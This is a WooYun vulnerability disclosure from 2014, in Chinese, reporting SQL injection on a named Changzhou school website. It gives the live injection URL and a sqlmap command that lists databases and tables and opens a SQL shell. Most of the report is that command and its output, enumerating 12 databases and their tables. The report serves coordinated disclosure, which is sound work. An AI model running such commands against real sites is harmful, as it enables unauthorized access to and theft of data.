当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059589

漏洞标题:某教育行业SQL注入漏洞(拿12个数据库+N多的表+sql-shell)

相关厂商:常州市教育科学研究院

漏洞作者: Anonymous.L

提交时间:2014-05-07 11:15

修复时间:2014-06-21 11:15

公开时间:2014-06-21 11:15

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-07: 细节已通知厂商并且等待厂商处理中
2014-05-10: 厂商已经确认,细节仅向厂商公开
2014-05-20: 细节向核心白帽子及相关领域专家公开
2014-05-30: 细节向普通白帽子公开
2014-06-09: 细节向实习白帽子公开
2014-06-21: 细节向公众公开

简要描述:

小型教育行业学校网站,sql注入,官网:http://jfl.czedu.com.cn/
话说:安全要从小抓起嘛。

详细说明:

注入点url: http://jfl.czedu.com.cn/index301-img/xwpd2.php?xxid=62&id=14146
python ./sqlmap/sqlmap.py -u "http://jfl.czedu.com.cn/index301-img/xwpd2.php?xxid=62&id=14146" --dbs --tables --sql-shell什么的:先上图

a.png


入口有了,继续往下:
12个数据库拿下来:
available databases [12]:
[*] chat
[*] flash
[*] flashtv
[*] information_schema
[*] jfltopxx
[*] mysql
[*] pt
[*] test
[*] upwebbook
[*] www1pt
[*] www1topxx
[*] wwwpt

b.png


接着就是各种表了:表是在太多了,我这里只能截些图了,顺便贴上点信息

c.png


-------------------------

d.png


太多了没等跑完就ctrl+C了
[22:34:28] [INFO] fetching tables
[22:34:28] [INFO] fetching number of tables for database 'information_schema'
[22:34:28] [INFO] retrieved: 28
[22:34:36] [INFO] retrieved: CHARACTER_SETS
[22:35:14] [INFO] retrieved: COLLATIONS
[22:35:48] [INFO] retrieved: COLLATION_CHARACTER_SET_APPLICABILITY
[22:36:59] [INFO] retrieved: COLUMNS
[22:37:15] [INFO] retrieved: COLUMN_PRIVILEGES
[22:37:44] [INFO] retrieved: ENGINES
[22:38:03] [INFO] retrieved: EVENTS
[22:38:11] [INFO] retrieved: FILES
[22:38:25] [INFO] retrieved: GLOBAL_STATUS
[22:38:55] [INFO] retrieved: GLOBAL_VARIABLES
[22:39:13] [INFO] retrieved: KEY_COLUMN_USAGE
[22:39:40] [INFO] retrieved: PARTITIONS
[22:40:06] [INFO] retrieved: PLUGINS
[22:40:15] [INFO] retrieved: PROCESSLIST
[22:40:39] [INFO] retrieved: PROFILING
[22:40:52] [INFO] retrieved: REFERENTIAL_CONSTRAINTS
[22:41:48] [INFO] retrieved: ROUTINES
[22:42:00] [INFO] retrieved: SCHEMATA
[22:42:18] [INFO] retrieved: SCHEMA_PRIVILEGES
[22:42:47] [INFO] retrieved: SESSION_STATUS
[22:43:20] [INFO] retrieved: SESSION_VARIABLES
[22:43:38] [INFO] retrieved: STATISTICS
[22:43:51] [INFO] retrieved: TABLES
[22:44:05] [INFO] retrieved: TABLE_CONSTRAINTS
[22:44:43] [INFO] retrieved: TABLE_PRIVILEGES
[22:45:08] [INFO] retrieved: TRIGGERS
[22:45:21] [INFO] retrieved: USER_PRIVILEGES
[22:45:59] [INFO] retrieved: VIEWS
[22:46:12] [INFO] fetching number of tables for database 'chat'
[22:46:12] [INFO] retrieved: 3
[22:46:13] [INFO] retrieved: chatsession
[22:46:37] [INFO] retrieved: message
[22:46:53] [INFO] retrieved: userlist
[22:47:05] [INFO] fetching number of tables for database 'flash'
[22:47:05] [INFO] retrieved: 2
[22:47:07] [INFO] retrieved: all_table
[22:47:20] [INFO] retrieved: menu
[22:47:25] [INFO] fetching number of tables for database 'flashtv'
[22:47:25] [INFO] retrieved: 4
[22:47:29] [INFO] retrieved: all_table
[22:47:42] [INFO] retrieved: menu
[22:47:54] [INFO] retrieved: pinglun
[22:48:15] [INFO] retrieved: user1
[22:48:28] [INFO] fetching number of tables for database 'jfltopxx'
[22:48:28] [INFO] retrieved: 15
[22:48:30] [INFO] retrieved: 2012zaosheng
[22:48:54] [INFO] retrieved: adip
[22:49:00] [INFO] retrieved: all_table
[22:49:18] [INFO] retrieved: banner
[22:49:27] [INFO] retrieved: djtj
[22:49:32] [INFO] retrieved: gg
[22:49:35] [INFO] retrieved: ip
[22:49:38] [INFO] retrieved: link
[22:49:47] [INFO] retrieved: ly
[22:49:49] [INFO] retrieved: menu
[22:49:55] [INFO] retrieved: pinglun
[22:50:10] [INFO] retrieved: techersms
[22:50:25] [INFO] retrieved: tp
[22:50:27] [INFO] retrieved: user1
[22:50:39] [INFO] retrieved: votes
[22:50:52] [INFO] fetching number of tables for database 'mysql'
[22:50:52] [INFO] retrieved: 25
[22:50:59] [INFO] retrieved: all_table
[22:51:19] [INFO] retrieved: all_tablepart
[22:51:30] [INFO] retrieved: all_tablepinglun
[22:51:49] [INFO] retrieved: columns_priv
[22:52:12] [INFO] retrieved: db
[22:52:15] [INFO] retrieved: event
[22:52:22] [INFO] retrieved: func
[22:52:36] [INFO] retrieved: general_log
[22:52:56] [INFO] retrieved: help_category
[22:53:15] [INFO] retrieved: help_keyword
[22:53:35] [INFO] retrieved: help_relation
[22:53:49] [INFO] retrieved: help_topic
[22:53:57] [INFO] retrieved: host
[22:54:01] [INFO] retrieved: ndb_binlog_index
[22:54:28] [INFO] retrieved: proc
[22:54:37] [INFO] retrieved: procs_priv
[22:54:49] [INFO] retrieved: servers
[22:54:58] [INFO] retrieved: slow_log
[22:55:19] [INFO] retrieved: tables_priv
[22:55:42] [INFO] retrieved: time_zone
[22:55:55] [INFO] retrieved: time_zone_leap_second
[22:56:20] [INFO] retrieved: time_zone_name
[22:56:38] [INFO] retrieved: time_zone_transition
[22:56:57] [INFO] retrieved: time_zone_transition_type
[22:57:09] [INFO] retrieved: user
[22:57:19] [INFO] fetching number of tables for database 'pt'
[22:57:19] [INFO] retrieved: 20
[22:57:25] [INFO] retrieved: adip
[22:57:35] [INFO] retrieved: all_table
[22:57:51] [INFO] retrieved: all_tablepart
[22:57:58] [INFO] retrieved: all_tablepinglun
[22:58:08] [INFO] retrieved: box_table
[22:58:21] [INFO] retrieved: boxpart
[22:58:29] [INFO] retrieved: diymb
[22:58:36] [INFO] retrieved: grjlm
[22:58:44] [INFO] retrieved: grly
[22:58:48] [INFO] retrieved: grphoto
[22:59:02] [INFO] retrieved: gryuru
[22:59:13] [INFO] retrieved: haoyou
[22:59:24] [INFO] retrieved: haoyouly
[22:59:28] [INFO] retrieved: links
[22:59:39] [INFO] retrieved: logolink
[22:59:48] [INFO] retrieved: perphotopart
[23:00:14] [INFO] retrieved: photopinglun
[23:00:45] [INFO] retrieved: pingyu
[23:00:54] [INFO] retrieved: sonuser
[23:01:03] [INFO] retrieved: user
[23:01:09] [INFO] fetching number of tables for database 'test'
[23:01:09] [INFO] retrieved: 0
[23:01:11] [WARNING] unable to retrieve the number of tables for database 'test'
[23:01:11] [INFO] fetching number of tables for database 'upwebbook'
[23:01:11] [INFO] retrieved: 14
[23:01:12] [INFO] retrieved: booknone
[23:01:52] [INFO] retrieved: bookpinglun
[23:02:39] [INFO] retrieved: bookrelation
[23:02:56] [INFO] retrieved: books
[23:03:00] [INFO] retrieved: bookus
再来看看有没有sql-shell:果然有
D:\python2.7.6>python ./sqlmap/sqlmap.py -u "http://jfl.czedu.com.cn/index301-im
g/xwpd2.php?xxid=62&id=14146" --sql-shell

e.png


漏洞证明:

漏洞详细里说的很清楚了。证明的话我就图放上来吧:

a.png


数据库:
available databases [12]:
[*] chat
[*] flash
[*] flashtv
[*] information_schema
[*] jfltopxx
[*] mysql
[*] pt
[*] test
[*] upwebbook
[*] www1pt
[*] www1topxx
[*] wwwpt

b.png


各种表。。。。
sql-shell:

e.png


修复方案:

过滤

版权声明:转载请注明来源 Anonymous.L@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-05-10 00:19

厂商回复:

最新状态:

暂无


漏洞评价:

评论